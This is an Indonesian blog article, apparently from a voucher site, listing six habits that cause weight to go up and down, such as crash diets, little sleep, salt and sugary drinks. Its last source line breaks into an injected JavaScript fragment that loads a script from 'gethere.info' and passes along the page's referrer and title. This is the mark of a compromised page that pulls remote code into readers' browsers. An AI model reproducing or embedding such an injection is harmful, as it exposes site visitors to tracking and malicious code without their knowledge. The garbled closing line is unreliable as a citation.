Yuk Kenali Alasan Berat Badan Sering Naik-Turun

 

Bagi setiap wanita di seluruh penjuru bumi masalah yang selalu menghantui mereka adalah berat badan. Tak jarang kita menemui wanita yang engga memberitahu berat badannya serta melakukan penimbangan berat badan karena takut melihat hasil dari timbangan tersebut. Tak jarang pula para wanita ini giat melakukan berbagai cara untuk menurunkan berat badan yang menjadi masalah bagi kecantikan mereka ini. Namun satu hal yang paling membuat gemas adalah kenapa setelah berhasil menurunkan berat badan menjadi proporsional hanya dalam jangka waktu beberapa bulan, celana kembali terasa sempit dan jarum timbangan kembali naik.

Ada juga orang yang sudah merasa makan dengan porsi sedikit tetapi berat badan susah sekali turun. Mengapa berat badan kita tidak stabil? Tanpa sadar, sering kali kita melakukan beberapa kebiasaan yang justru mengganggu metabolisme tubuh sehingga bobot tubuh mudah naik-turun. Nah berikut ini adalah kebiasaan-kebiasaan yang gak seharusnya kita lakukan jika ingin berat badan kita tetap stabil! Mari simak

  1. Ingin serba instan

Ini salah satu kebiasaan wanita, maunya serba instan dan malas melewati yang namanya proses. Ingin langsing, minum obat diet, suntik sana suntik sini, ada yang tidak makan sekalian. Beragam cara salah yang akhirnya merusak tubuh sendiri. Berat badan mungkin cepat turun, tetapi pasti akan cepat naik lagi. Seharusnya ada target hasil yang realistis dengan upaya yang setara. Jangan bermimpi turun berat badan 5 kilogram dalam sebulan jika tetap mengkonsumsi makanan berlemak dan tinggi kalori setiap hari.

Sumber: NgaturDuit.com

 

  1. Kurang aktivitas fisik

Berat badan tidak akan berkurang hanya dengan diet dan tidak akan naik dengan mudah juga jika kita giat melakukan aktivitas fisik. Untuk hasil maksimal, gabungkan diet dengan aktivitas fisik secara rutin. Tidak hanya membuat langsing, kombinasi diet dan olahraga menyehatkan tubuh dan mencegah tubuh kembali gemuk.

Sumber: Kesekolah.com

 

  1. Coba-coba diet karena tren

Banyak ahli gizi atau ilmuwan yang menciptakan pola-pola diet tertentu yang sering kali hasilnya hanya sementara. Diet Atkins misalnya, melarang pediet mengkonsumsi karbohidrat dan hanya fokus pada makanan berprotein tinggi. Jenis diet ini memang bisa menurunkan berat badan dengan cepat, tapi sampai berapa lama kita harus makan tanpa karbohidrat.

Bagaimanapun, tubuh memerlukan karbohidrat untuk menjaga keseimbangan metabolisme dan aktivitas tubuh. Lupakan diet musiman dan ikuti diet sehat yang memasukkan semua nutrisi yang dibutuhkan tubuh dengan jumlah proporsional

Sumber: Tribunnews.com

 

  1. Kurang tidur

Tidur kurang dari 7-8 jam sehari akan menyulitkan tubuh mengumpulkan energi untuk beraktivitas, juga mencerna makanan. Sejumlah penelitian menunjukkan, orang yang mengalami lelah setiap hari, metabolisme tubuhnya akan menurun. Metabolisme merupakan proses mengubah nutrisi makanan dan kalori menjadi energi yang dibutuhkan tubuh untuk melakukan aktivitas.

Metabolisme rendah, berarti kemampuan tubuh untuk membakar kalori juga lebih sedikit. Kebanyakan orang yang jam tidurnya kurang justru akan mengalami kenaikan berat badan.

Sumber:SitKes.com

5. Konsumsi garam berlebihan

Konsumsi garam yang berlebihan membuat tubuh menumpuk cairan. Hal ini menyebabkan area perut tampak buncit. Hindari atau kurangi makanan yang banyak mengandung garam, seperti junk food dan daging olahan. Biasakan menyajikan makanan hanya dengan sedikit garam atau menggantinya dengan berbagai macam bumbu dapur seperti rempah-rempah untuk memperkaya rasa masakan. Pilih juga bahan makanan yang netral, seperti daging ayam tanpa kulit, buah, dan sayuran segar.

Sumber: DuniaFitnes.com

 

  1. Suka minuman manis

Naiknya bobot tubuh juga dipengaruhi cairan yang masuk ke dalam tubuh. Kalau merasa sudah makan dengan porsi sedikit, perhatikan apakah minuman yang dipilih sudah aman. Minuman yang manis dan berwarna sudah pasti mengandung gula, belum lagi sirup, susu, dan bahan lainnya yang menambah sedap rasa. Gula dan zat yang sejenis ini memberi kontribusi besar pada penambahan kalori sehingga tanpa terasa bobot tubuh naik dengan mudah.

Sumber: blog.tokopedia.com

 

Nah Sobat Evoucher udah tahukan apa saja kebiasaan yang gak seharusnya dilakukan jika ingin menjaga berat badan tetap proposional??? Pasti diantara kalian semua pernah deh melakukan salah satu hal di atas! Nah mulai sekarang ingat ya perlu perjuangan untuk mencapai keinginan kita semua! Semangat!!!

 

Sumber: www.tempo.cos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;